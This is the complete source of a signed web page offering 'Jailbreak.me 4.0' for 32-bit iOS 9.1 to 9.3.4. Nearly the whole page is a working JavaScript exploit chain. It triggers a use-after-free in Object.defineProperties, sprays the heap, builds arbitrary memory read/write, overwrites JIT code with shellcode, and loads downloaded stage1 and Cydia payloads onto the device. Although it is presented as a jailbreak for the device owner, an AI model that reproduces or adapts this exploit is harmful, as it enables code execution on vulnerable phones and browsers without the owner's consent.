<!--
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

- -->
<html>
 <head>
 <meta http-equiv="content-type" content="text/html;charset=utf-8">
 <meta name="viewport" content="user-scalable=1.0,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0">
 <meta name="apple-mobile-web-app-capable" content="yes">
 <meta name="format-detection" content="telephone=no">
<style>
 body {
 overflow: hidden;
 position: fixed;
 position: relative;
 }
 h1{
 overflow: hidden;
 position: fixed;
 position: absolute;
 top: 30%;
 left: 50%;
 transform: translate(-50%, -50%);
 }

 </style>
 <meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;"/>
</head>
<body>
<script>
function load_binary_resource(url) {
  var req = new XMLHttpRequest();
  req.open('GET', url, false);
  req.overrideMimeType('text\/plain; charset=x-user-defined');
  req.send(null);
  if (req.status != 200) {
    document.write("fail downloading loader");
    stop=1;
  }
  return req.responseText;
}

filestream = "LOADING";
payload_tar = "LOADING";
payload_cydia = "LOADING";
payload_launchctl = "LOADING";
payload_offsets = "LOADING";

var pressure = new Array(400);
var bufs = new Array(10000);


var fcp = 0;
var smsh = new Uint32Array(0x10);

var trycatch = "";
for(var z=0; z<0x2000; z++) trycatch += "try{} catch(e){}; ";
var fc = new Function(trycatch);

function getArrFromResource(res){
  while (res.length % 4){
    res += "A";
  }
  var ret = new Uint32Array(res.length/4);
  for(var i = 0; i < res.length; i+=4){
    var word = (res.charCodeAt(i) & 0xff) | ((res.charCodeAt(i+1) & 0xff) << 8)  | ((res.charCodeAt(i+2) & 0xff) << 16)  | ((res.charCodeAt(i+3) & 0xff) << 24);
    ret[i/4] = word;
  }
  return ret;
}

function swag() {
	if(bufs[0]) return;

	dgc();

	for (i=0; i < bufs.length; i++) {
    bufs[i] = new Uint32Array(0x100*2)
		for (k=0; k < bufs[i].length; )
		{
			bufs[i][k++] = 0x41414141;
			bufs[i][k++] = 0xffff0000;
		}
	}
  console.log("doneswag");
}

function smashed(stale,tar_ptr,cydia_ptr,launchctl_ptr,offsets_ptr) {
  console.log("smsh len="+smsh.length);

  console.log("fcp=0x"+fcp.toString(16));
  console.log("binfile=0x"+binfile.toString(16));


  // getJIT
  r2 = smsh[(fcp+0x14)/4];
  r3 = smsh[(r2+0x10)/4];
  shellcode = (smsh[(r3+0x14)/4]&0xfffff000)-0x10000;
  console.log("r2=0x"+r2.toString(16));
  console.log("r3=0x"+r3.toString(16));
  console.log("shellcode=0x"+shellcode.toString(16));

  console.log("Plant payload3="+offsets_ptr.toString(16));
  smsh[shellcode/4] = offsets_ptr;
  shellcode += 4;

  console.log("Plant payload2="+launchctl_ptr.toString(16));
  smsh[shellcode/4] = launchctl_ptr;
  shellcode += 4;

  console.log("Plant payload1="+cydia_ptr.toString(16));
  smsh[shellcode/4] = cydia_ptr;
  shellcode += 4;

  console.log("Plant payload0="+tar_ptr.toString(16));
  smsh[shellcode/4] = tar_ptr;
  shellcode += 4;

  for(var i = 0; i < filestream.length; i+=4)
  {
    var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i+1) & 0xff) << 8)  | ((filestream.charCodeAt(i+2) & 0xff) << 16)  | ((filestream.charCodeAt(i+3) & 0xff) << 24);
    smsh[(shellcode+i)/4] = word;
  }

  smsh[(fcp+0x00)/4] = fcp+4;
  smsh[(fcp+0x04)/4] = fcp+4;
  smsh[(fcp+0x08)/4] = shellcode+1; //PC
  smsh[(fcp+0x30)/4] = fcp+0x30+4-0x18-0x34+0x8;


  console.log("Do fc() smashed");
  fc();

  console.log("end smashed");
}

function sleep(delay) {
    var start = new Date().getTime();
    while (new Date().getTime() < start + delay);
}

dgc = function() {
  console.log("dgc start");
	for (var i = 0; i < pressure.length; i++) {
    pressure[i] = new Uint32Array(0xa000);
	}
  // sleep(1000);
  console.log("dgc done");
}
dgcf = function() {
  console.log("dgcf start");
	for (var i = 0; i < pressure.length; i++) {
		pressure[i] = 0
	}
  console.log("dgcf done");
}

go = function(){
  console.log("going");
  document.getElementById('bigButton').innerHTML = "Running stage 1 exploit";
  setTimeout(go_, 100);
}

function swag() {
	if(bufs[0]) return;

	dgc();

	for (i=0; i < bufs.length; i++) {
		bufs[i] = new Uint32Array(0x100*2)
		for (k=0; k < bufs[i].length; )
		{
			bufs[i][k++] = 0x41414141;
			bufs[i][k++] = 0xffff0000;
		}
	}
}

var binfile = 0;
var mem0=0;
var mem1=0;
var mem2=0;

_dview = null;
function u2d(low, hi) {
    if (!_dview) _dview = new DataView(new ArrayBuffer(16));
    _dview.setUint32(0, hi);
    _dview.setUint32(4, low);
    return _dview.getFloat64(0);
}

function d2u(f) {
    if (!_dview) _dview = new DataView(new ArrayBuffer(16));
    _dview.setFloat64(0,f);
    return _dview.getUint32(0);
}

function go_(){
  var arr = new Array(2047);
  var not_number = {};
  not_number.toString = function() {
  	arr = null;
  	props["stale"]["value"] = null;
    swag();
  	return 10;
  };

  smsh[0] = 0x21212121;
  smsh[1] = 0x31313131;
  smsh[2] = 0x41414141;
  smsh[3] = 0x51515151;
  smsh[4] = 0x61616161;
  smsh[5] = 0x71717171;
  smsh[6] = 0x81818181;
  smsh[7] = 0x91919191;

  var props = {
  	p0 : { value : 0 },
  	p1 : { value : 1 },
  	p2 : { value : 2 },
  	p3 : { value : 3 },
  	p4 : { value : 4 },
  	p5 : { value : 5 },
  	p6 : { value : 6 },
  	p7 : { value : 7 },
  	p8 : { value : 8 },
  	length : { value : not_number },
  	stale : { value : arr },
  	after : { value : 666 }
  };

  var target = [];
  var stale = 0;
  var before_len = arr.length;
  console.log("before="+before_len);
  Object.defineProperties(target, props);
  stale = target.stale;
  console.log("after="+stale.length);

  if (stale.length != 0x41414141){
    alert("exploit failed");
    location.reload();
    return;
  }

  var obuf = new Uint32Array(2);
  obuf[0] = 0x41414141;
  obuf[1] = 0xffff0000;

  stale[0] = 0x12345678;
  stale[1] = {};


  for(var z=0; z<0x100; z++) fc();

  console.log("pre array");
  for (i=0; i < bufs.length; i++) {
    var dobreak = 0;
    for (k=0; k < bufs[0].length; k++){
  	   if(bufs[i][k] != obuf[k%2]){

        console.log("bufs[i][k]  =0x"+bufs[i][k].toString(16));
        console.log("bufs[i][k+1]=0x"+bufs[i][k+1].toString(16));

        stale[0] = fc;
        fcp = bufs[i][k];

        stale[0] = filestream;
        binfile = bufs[i][k];

        stale[0] = payload_tar;
        var payload_tar_ptr = bufs[i][k];

        stale[0] = payload_cydia;
        var payload_cydia_ptr = bufs[i][k];

        stale[0] = payload_launchctl;
        var payload_launchctl_ptr = bufs[i][k];

        stale[0] = payload_offsets;
        var payload_offsets_ptr = bufs[i][k];

        stale[0] = smsh;
        var ptrsmsh = bufs[i][k];

        stale[2] = {'a':u2d(0x2,0x10),'b':smsh, 'c':u2d(0,0), 'd':u2d(0,0)}
        stale[0] = {'a':u2d(0,0x00e00600),'b':u2d(1,0x10), 'c':u2d(bufs[i][k+2*2]+0x10,0), 'd':u2d(0,0)}
        stale[1] = stale[0];
        bufs[i][k] += 0x10; // misalign so we end up in JSObject's properties, which have a crafted Uint32Array pointing to smsh
        var leak = stale[0][0].charCodeAt(0);
            leak += stale[0][1].charCodeAt(0) << 8;
            leak += stale[0][2].charCodeAt(0) << 16;
            leak += stale[0][3].charCodeAt(0) << 24;
        console.log("leakptr=0x"+leak.toString(16));
        bufs[i][k] -= 0x10;
        stale[0] = {'a':u2d(leak,0x00602300), 'b':u2d(0,0), 'c':smsh, 'd':u2d(0,0)}
        stale[1] = stale[0];
        bufs[i][k] += 0x10; // misalign so we end up in JSObject's properties, which have a crafted Uint32Array pointing to smsh
        stale[0][4] = 0;
        stale[0][5] = 0xffffffff;
        bufs[i][k] -= 0x10;

        mem0 = stale[0];
        mem2 = smsh;
        if (smsh.length != 0x10) {

          document.getElementById('bigButton').innerHTML = "Running stage 2 exploit"
          setTimeout(function () {
              smashed(stale,payload_tar_ptr,payload_cydia_ptr,payload_launchctl_ptr,payload_offsets_ptr);
            }, 100);
        }

        dobreak = 1;
        break;
       }
     }
     if (dobreak) break;
   }

  console.log("end");
}

function loadRes(){
  console.log("Downloading resources");
  document.getElementById('bigButton').innerHTML = "Downloading Resources"
  setTimeout(function () {
    filestream = load_binary_resource("stage1.bin")
    payload_tar = getArrFromResource(load_binary_resource("payload/tar"))
    payload_launchctl = getArrFromResource(load_binary_resource("payload/launchctl"))
    payload_offsets = getArrFromResource(load_binary_resource("payload/offsets.json"))

    document.getElementById('bigButton').innerHTML = "Downloading Cydia"
    setTimeout(function () {
        payload_cydia = getArrFromResource(load_binary_resource("payload/Cydia.tar"))
        go();
        }, 100);
      }, 100);
}
</script>


<center>
  Jailbreak.me 4.0 for <br>
  iOS 9.1 - iOS 9.3.4 <br>
  (32bit only) <br>
  <br>
  This was a fun project and is now released with absolutely no support!<br>
  If this jailbreak doesn't work for you, please use <a href="http://wall.supplies">HomeDepot</a> instead!<br>
  <br>
  <div id="stuff">
    <div id="bigButton" style="font-size:42px;font-family: Arial Black,Arial Bold,Gadget,sans-serif">
      <a href="javascript:loadRes()">jailbreak me!</a>
    </div>
    <br>
    <div id="shasums">
      SHA256:<br>
      786ae1f2df2adfad6a759ecbd1bcc4ea53ff137b57ddb30f3eded8387e8a91fa  stage1.bin<br>
      bd1d4d164a0818499ad535f7dcc44c5412f1649ffce32afc6b47e38f921c1a98  payload/offsets.json<br>
      8d60d644e01adf56e9658eda61dffb1b0747c663e2e843038e8e7ed26ccc2e9d  payload/launchctl<br>
      79ecf177780bada6d2565934121b5bc60eff77dea0785014e33001499d3bfb98  payload/Cydia.tar<br>
      48f56b56e071e05d9a595a3420b0e5af1d094d3360d6e5455bc7da498903bb1e  payload/tar<br>
    </div>
  </div>
  <br>
  <br>
  This HTML is signed with PGP!<br>
  Check page sourcecode to verify signature!
</center>
</body>
</html>
<!--
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEhP4n5saWZp3fpLDl/96aHmqiD60FAlooZiIACgkQ/96aHmqi
D60Eaw//Xts7TiZvTw8kexR8fCDot+IZU7xLYnrfB9qPVUXHo0ePHUPaYcPCLvBI
lxl0vxeUIaauLqbNRxi//x8DzsCRi9/rsvHAjJPQDrm5+28WiMm4zbL0D9zVQWCu
0P+NR3VYBFq8L2yA5/5+opkF37gLvNnP9er8hUux2U6sdfbbzFU7sStNeceBq3di
l5/WKNd6iH5EbGjCrxA3DbJxNU/sFbrSASUkwdyU+Epsf/nwoN2WOhhqHRJDatyI
fEWjnuDBjtcOFOYFmWc34wrtznmjiOob2Nrd24XOlLzXj4PJ82J/3l5Tx/kh9OM9
3Im/NZZpVRjkiyyNtOqfbWClvpitYpKqBnA/utfR30DNWDeLntX8WIoiLdkJ7BF3
d1eBivSQfWrNYiv1M5IcXjH/bP5nPJRXDYzR8LFfb9KTu37BJIjtNwt6KUJ8z8Gh
Clp/gbMCJ7X7cuYISH4MRQTL/N3sAGUyNu8L4MXt7Scyudsd0klvEVA1rHeifzQ8
/Zxyboq3uI4DZZ0LTl+4zE1iUHj3mQJBWWVqUcTjEHk9fRDqaq3i9NWnBKRHj20h
JqwRJTTjp4zKZsJ4i/80aAAm25DEhCj6Ik50BUFwQRGiuIHS0jV+WoPsi+Tz3m/5
//h0h1akeIKkYFRVZ9AS1YtIQIkvgqmhHvBOclV+hwk59GWwwmA=
=RqDq
-----END PGP SIGNATURE-----
-->
